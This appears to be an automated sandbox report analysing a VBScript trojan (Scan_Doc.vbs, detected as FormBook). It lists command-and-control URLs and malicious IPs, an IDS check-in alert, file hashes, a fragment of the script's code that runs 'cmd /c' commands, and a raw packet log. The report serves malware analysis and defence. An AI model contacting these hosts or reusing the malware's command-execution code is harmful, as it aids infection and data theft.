                                    http://www.lajzznhk.cfd/g94s/www.latamgradoenenfermeria.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.rixiojjl.cfd/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.brezop.xyz/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.407299228.000000000F270000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      http://www.krmq9w.cfd/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.krmq9w.cfd/g94s/www.qsmdrkjw.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.yprblqkk.cfd/g94s/www.lojq5vh.buzzexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.lojq5vh.buzz/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.brezop.xyz/g94s/www.hyperpigmentation-91528.bondexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.qsmdrkjw.cfdReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.latamgradoenenfermeria.comReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.hyperpigmentation-91528.bondReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.lojq5vh.buzzexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.xnmshx.cfd/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 00000004.00000000.426945176.00007FFC1B439000.00000002.00000001.01000000.00000008.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.93txm.liveexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.yprblqkk.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.apinspect.netReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.93txm.live/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.latamgradoenenfermeria.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.baroevent.com/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://freswe.clickpowershell.exe, 00000001.00000002.392901894.0000021091AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.392901894.0000021091B10000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.styledinfaith.com/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                        IP | Domain | Country | ASN | ASN Name | Malicious
                                        209.142.66.216 | electorhome.com | Reserved | 53732 | INNSYSCA | true
                                        185.53.179.91 | www.hyperpigmentation-91528.bond | Germany | 61969 | TEAMINTERNET-ASDE | true
                                        76.223.105.230 | apinspect.net | United States | 16509 | AMAZON-02US | true
                                        99.83.196.71 | baroevent.com | United States | 16509 | AMAZON-02US | true
                                        188.166.220.201 | freswe.click | Netherlands | 14061 | DIGITALOCEAN-ASNUS | false
                                        150.95.255.38 | www.qsmdrkjw.cfd | Japan | 7506 | INTERQGMOInternetIncJP | true
                                        Joe Sandbox Version:38.0.0 Beryl
                                        Analysis ID:1272266
                                        Start date and time:2023-07-13 09:47:45 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 15m 1s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:11
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample file name:Scan_Doc.vbs
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winVBS@11/4@10/6
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:
                                        • Successful, ratio: 35.4% (good quality ratio 32.8%)
                                        • Quality average: 76.5%
                                        • Quality standard deviation: 28.7%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 99
                                        • Number of non-executed functions: 154
                                        Cookbook Comments:
                                        • Found application associated with file extension: .vbs
                                        • Override analysis time to 240s for JS/VBS files not yet terminated
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
                                        • Not all processes were analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: Scan_Doc.vbs
                                        Time | Type | Description
                                        09:48:53 | API Interceptor | 1x Sleep call for process: powershell.exe modified
                                        09:49:01 | API Interceptor | 1858x Sleep call for process: explorer.exe modified
                                        Process:C:\Windows\explorer.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):984
                                        Entropy (8bit):5.227423502376633
                                        Encrypted:false
                                        SSDEEP:24:Yq6CUXyhm5IUmtQlbNdB6hm5VUmtQlz0Jahm5SUmtQlHZ6T06Mhm5vUmtQlbxdB8:YqDUXycIwbNdUcpwz0JacWwHZ6T06Mcb
                                        MD5:D9512E54D33D06E68E0C0D36726F7776
                                        SHA1:2E2ED852C188E0F96FCF861D7B73B8C479379845
                                        SHA-256:C70B840F192B885EF63C8426B0667EF175424A96DEC79A988C9525AD8E6997D2
                                        SHA-512:AAFCD49F2C87D4D43076CB4C1357FFAC9AB224ADBD4CEB06961755A0D6305D550090DDA34CAAA3C9B2700EF182CC9D6000BAB87A1A31D15A6A9F7565F60BA515
                                        Malicious:false
                                        Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2360844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2350844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2340844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2330844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2320844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2310844864,"LastSwitchedHighPart":30747916,"PrePopulated":true}]}
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.9260988789684415
                                        Encrypted:false
                                        SSDEEP:3:Nlllulb/lj:NllUb/l
                                        MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                        SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                        SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                        SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                        Malicious:false
                                        Preview:@...e................................................@..........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        File type:Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
                                        Entropy (8bit):3.704605738327414
                                        TrID:
                                        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                        • MP3 audio (1001/1) 32.22%
                                        • Lumena CEL bitmap (63/63) 2.03%
                                        • Corel Photo Paint (41/41) 1.32%
                                        File name:Scan_Doc.vbs
                                        File size:398'490 bytes
                                        MD5:eca38e49a376a162a21d257363a2263e
                                        SHA1:80a99c2a933d454b3654d1a7bca7993c1b1355fb
                                        SHA256:a3fd50cd54fa36cec2ee064e52c91d2106701374fcd3e0ad1e22cbf17479ca71
                                        SHA512:90c5b628525d445b33e090eb45f61a66d2b6eceb9b1af20ebbc3f510be93eb8c1770f18e41213cf75c5d3a740e1f12a8b8587e2e4500c24dadb1fe737d7aa197
                                        SSDEEP:3072:l5n5p5XNsn1+7HLDVZBMxzaksTvvspFIsWxXj6ZEYbdHznXmxLJIrCsS4CYuGgs3:cn+NMxzakPIsWxXj6r
                                        TLSH:588470016EEF0009A2A3AACF5BF144A44F3BB9765538C56D515E1A0E07EBDC0BD61FB2
                                        File Content Preview:..D.i.m. .F.S.O.,. .s.h.e.l.l.,. .x.s.l.P.r.o.c.e.s.s.o.r.........S.u.b. .R.u.n.C.m.d.(.C.o.m.m.a.n.d.S.t.r.i.n.g.,. .O.u.t.p.u.t.F.i.l.e.)..... . . . .c.m.d. .=. .".c.m.d. ./.c. .". .+. .C.o.m.m.a.n.d.S.t.r.i.n.g. .+. .". .>.>. .". .+. .O.u.t.p.u.t.F.i.l
                                        Icon Hash:68d69b8f86ab9a86
                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                        07/13/23-09:50:17.734032 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49701 | 80 | 192.168.2.3 | 76.223.105.230
                                        Jul 13, 2023 09:48:53.212393999 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.212423086 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.212424040 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212460041 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212493896 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212527990 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212532043 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.212563992 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.212629080 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212666035 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212698936 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212734938 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212738991 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.212770939 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.390516996 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390603065 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390666008 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390712023 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390744925 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390798092 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.390816927 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390856981 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.390876055 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390888929 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.390933990 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390995026 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391052961 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391058922 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391108990 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391135931 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391218901 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391321898 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391391039 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391402960 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391458035 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391484022 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391547918 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391603947 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391661882 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391663074 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391712904 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391719103 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391777992 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391834021 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391889095 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391890049 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391938925 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391946077 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392003059 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392060995 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392121077 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392122984 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.392172098 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.392178059 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392235041 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392321110 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392381907 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392385960 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.392441988 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392441988 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.392501116 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.395344973 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.570421934 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570513010 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570573092 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570628881 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570645094 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.570689917 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570705891 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.570754051 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570828915 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570880890 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.570887089 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570930958 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.570945978 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571022987 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571079016 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571126938 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571135998 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571181059 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571192026 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571250916 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571305990 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571355104 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571362019 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571407080 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571419001 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571475029 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571530104 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571576118 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571588039 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571631908 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571645021 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571702957 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571759939 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571804047 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571815968 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571858883 CEST4969880192.168.2.3188.166.220.201
